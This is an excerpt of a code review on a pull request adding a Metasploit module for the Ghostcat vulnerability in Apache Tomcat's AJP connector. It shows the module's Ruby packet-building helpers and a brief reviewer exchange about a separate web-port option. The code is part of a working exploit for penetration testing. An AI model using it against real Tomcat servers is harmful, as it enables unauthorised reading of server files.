modules/auxiliary/admin/http/tomcat_ghostcat.rb

```diff
@@ -0,0 +1,267 @@
+            "accept-charset" => "\xA0\x02",
+            "accept-encoding" => "\xA0\x03",
+            "accept-language" => "\xA0\x04",
+            "authorization" => "\xA0\x05",
+            "connection" => "\xA0\x06",
+            "content-type" => "\xA0\x07",
+            "content-length" => "\xA0\x08",
+            "cookie" => "\xA0\x09",
+            "cookie2" => "\xA0\x0A",
+            "host" => "\xA0\x0B",
+            "pragma" => "\xA0\x0C",
+            "referer" => "\xA0\x0D",
+            "user-agent" => "\xA0\x0E"
+        }
+        headers_ajp = Array.new
+        for (header_name, header_value) in headers do
+            code = header2code[header_name].to_s
+            if code != ""
+                headers_ajp.append(code)
+                headers_ajp.append(ajp_string(header_value.to_s))
+            else
+                headers_ajp.append(ajp_string(header_name.to_s))
+                headers_ajp.append(ajp_string(header_value.to_s))
+            end
+        end
+        return int2byte(headers.length,2), headers_ajp
+    end
+    def make_attributes(attributes)
+        attribute2code = {
+            "remote_user" => "\x03",
+            "auth_type" => "\x04",
+            "query_string" => "\x05",
+            "jvm_route" => "\x06",
+            "ssl_cert" => "\x07",
+            "ssl_cipher" => "\x08",
+            "ssl_session" => "\x09",
+            "req_attribute" => "\x0A",
+            "ssl_key_size" => "\x0B"
+        }
+        attributes_ajp = Array.new
+        for attr in attributes
+            name = attr.keys.first.to_s
+            code = (attribute2code[name]).to_s
+            value = attr[name]
+            if code != ""
+                attributes_ajp.append(code)
+                if code == "\x0A"
+                    for v in value
+                        attributes_ajp.append(ajp_string(v.to_s))
+                    end
+                else
+                    attributes_ajp.append(ajp_string(value.to_s))
+                end
+            end
+        end
+        return attributes_ajp
+    end
+
+    def ajp_string(message_bytes)
+        int2byte(message_bytes.length, 2) + message_bytes + "\x00"
+    end
+
+    def int2byte(data, byte_len=1)
+        if byte_len == 1
+            return [data].pack("C")
+        else
+            return [data].pack("n*")
+        end
+    end
+
+    def make_forward_request_package(method,headers,attributes)
+
+        prefix_code_int = 2
+        prefix_code_bytes = int2byte(prefix_code_int)
+        method_bytes = int2byte(method2code(method))
+        protocol_bytes = "HTTP/1.1"
+        req_uri_bytes = "/index.txt"
+        remote_addr_bytes = "127.0.0.1"
+        remote_host_bytes = "localhost"
+        server_name_bytes = datastore['RHOST'].to_s
+
+        if datastore['SSL'] == true
+            is_ssl_boolean = 1
+        else
+            is_ssl_boolean = 0
+        end
+        server_port_int = datastore['PORTWEB']
```

Comment:
How does this differ to `RPORT`? 👀

Reply:
Yes, it is different from RPORT,

Reply:
It is one for web-based and one for APJ13 use.